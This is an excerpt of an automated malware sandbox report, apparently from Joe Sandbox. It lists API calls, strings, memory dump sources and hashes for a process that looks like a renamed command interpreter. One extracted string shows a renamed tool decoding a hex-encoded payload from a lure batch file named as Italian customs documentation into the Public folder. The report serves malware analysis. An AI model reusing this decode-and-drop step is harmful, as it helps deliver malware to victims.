                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFBF
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7E1DDEFDC
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFED
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF003
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF022
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF083
                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF092
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF0A5
                                                      • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7E1DDF0DB
                                                      • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF135
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF16C
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF185
                                                        • Part of subcall function 00007FF7E1DC01B8: _get_osfhandle.MSVCRT ref: 00007FF7E1DC01C4
                                                        • Part of subcall function 00007FF7E1DC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC01D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                      • String ID: <noalias>$CMD.EXE
                                                      • API String ID: 1161012917-1690691951
                                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                      • Instruction ID: bc9efa534f7194d580a059115afa4fb9067c02078aa670097b56e4856e0557a9
                                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                      • Instruction Fuzzy Hash: 74918422F0965296FB15FB70D4423BDBAA0AF49B59F848236DD0E43794DFBCA445C322
                                                      APIs
                                                      Strings
                                                      • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\, xrefs: 00007FF7E1DCC9F1
                                                      • GOTO, xrefs: 00007FF7E1DBD0A3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                      • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\$GOTO
                                                      • API String ID: 3863671652-1122420156
                                                      • Opcode ID: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                      • Instruction ID: a5d8bd550043e07c831d4c9aab387525c9e481b949d0ad55120c46f19a3550e0
                                                      • Opcode Fuzzy Hash: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                      • Instruction Fuzzy Hash: 1BE1DE22E0D64292FB64FB1594567B9E6A0BF89784FC84537DA0E422D0DFBCE841C763
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$BufferConsoleInfoScreen
                                                      • String ID:
                                                      • API String ID: 1034426908-0
                                                      • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                      • Instruction ID: 1e2b05eb7fc18875babc9126ddd7b3df1e1bebb1f2a674aa9e18998d8d1fa8a2
                                                      • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                      • Instruction Fuzzy Hash: 82F1A032A097829AEB64EF21D8427E9A7A0FF45784F808136DA4E47795DFBCF504C721
                                                      APIs
                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAA85
                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAACF
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAAEC
                                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDAB39
                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDAB6F
                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDABA4
                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7E1DD98C0), ref: 00007FF7E1DDABCB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteValue$CreateOpen
                                                      • String ID: %s=%s
                                                      • API String ID: 1019019434-1087296587
                                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                      • Instruction ID: eeaca4c8d1d37fa740226598ca499e0b83d55dd0b0ec19b041cae7c1b70f8bb8
                                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                      • Instruction Fuzzy Hash: AF51A531B0875296E760EB25A8467BAF7A1FB89791F81C236CA4D83790DFBCD442C711
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$FullNamePathwcsrchr
                                                      • String ID:
                                                      • API String ID: 4289998964-0
                                                      • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                      • Instruction ID: 46ebeda9c88c80cf5cf1044ef5107596b48eb29a0c16b1f0f72b54442335a940
                                                      • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                      • Instruction Fuzzy Hash: 14C1C311E0935692EFA4FB51954A779A3A0FB45B90F815632CE0E077D0DFBCA491C362
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID:
                                                      • API String ID: 2221118986-0
                                                      • Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                      • Instruction ID: 931aa7ff86b1b35f3231b549eb772980d6f29d3d8ec5840036c79809ba846e1b
                                                      • Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                      • Instruction Fuzzy Hash: F9C1F562E0978296EB64EB20E852BF9A3A0FB94784F844536DA0F07794DFBCE551C311
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: GeToken: (%x) '%s'
                                                      • API String ID: 2081463915-1994581435
                                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                      • Instruction ID: cec4c7b3183c80703036b39bd2b6680e02f83b4e6cb631473a830adaf79e0424
                                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                      • Instruction Fuzzy Hash: 9D71BC20E08642A5FB64FB24A8867B9A6E0AF05759FC4453BD50F432A5DFFCA4918322
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$iswspacewcschr
                                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                      • API String ID: 840959033-3627297882
                                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                      • Instruction ID: c421526ab7fca0619a36b3f039d2c93d4f4f4737810d5a35944bd677fb0c8efc
                                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                      • Instruction Fuzzy Hash: 3CD13A21E0864396EB14FB21A8473B9A7A0BF44B45FC48837D94E86295DFBCE445C7B2
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DB32F3
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7E1DB32A4), ref: 00007FF7E1DB3309
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7E1DB3384
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DD11DF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                      • String ID:
                                                      • API String ID: 611521582-0
                                                      • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                      • Instruction ID: e67de628feecd4995199a8be9ed52fba567cc3b849a72915c67a4e4799ac21ff
                                                      • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                      • Instruction Fuzzy Hash: 77A1B332F08612A6E718EB61A84277DF7A1FB49B46F848136DD0E86744DFBCE445C722
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CreateFile_open_osfhandle
                                                      • String ID: con
                                                      • API String ID: 2905481843-4257191772
                                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                      • Instruction ID: 28c94b767a3f3a8ab91745c11f618c4a820b8c3368c99349bcebe8ad41540cb1
                                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                      • Instruction Fuzzy Hash: BB71F572A086818AE720EF14E441379FAA0FB89B61F908636DE5E437D4DFBCD449CB51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                      • String ID: CSVFS$NTFS$REFS
                                                      • API String ID: 3510147486-2605508654
                                                      • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                      • Instruction ID: d5109ec977ddfb670ce27ede2dd98124cdc1ebd0c64a30f435b3edf5cd48074b
                                                      • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                      • Instruction Fuzzy Hash: 12617032B04BC28AEB65DF21D8453E9B7A4FB45B85F848136DA0E8B758DFB8D104C711
                                                      APIs
                                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF7E1DB7279,?,?,?,?,?,00007FF7E1DBBFA9), ref: 00007FF7E1DD4485
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: longjmp
                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                      • API String ID: 1832741078-366822981
                                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                      • Instruction ID: f2986dfb5bad7aab7f88fde25f359ef9a1f6a9f63bd8ddbb89306ee490ca39ef
                                                      • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                      • Instruction Fuzzy Hash: CBC19060F0C64292EB29FB165583BB8A391AB46B94FD14137DD0E93B91CFBCE4458363
                                                      APIs
                                                      • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC6677
                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC668F
                                                      • _errno.MSVCRT ref: 00007FF7E1DC66A3
                                                      • wcstol.MSVCRT ref: 00007FF7E1DC66C4
                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC66E4
                                                      • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC66FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                                      • API String ID: 2348642995-441775793
                                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                      • Instruction ID: ca8143f6e47332e88ab069ff67c314f5b3a21bba278fb472dbcc5122a00a3721
                                                      • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                      • Instruction Fuzzy Hash: FF719172D0864685EB60AF11D412379F7A0EB45B45F94C833DA5E82794EFBCE484C7A2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
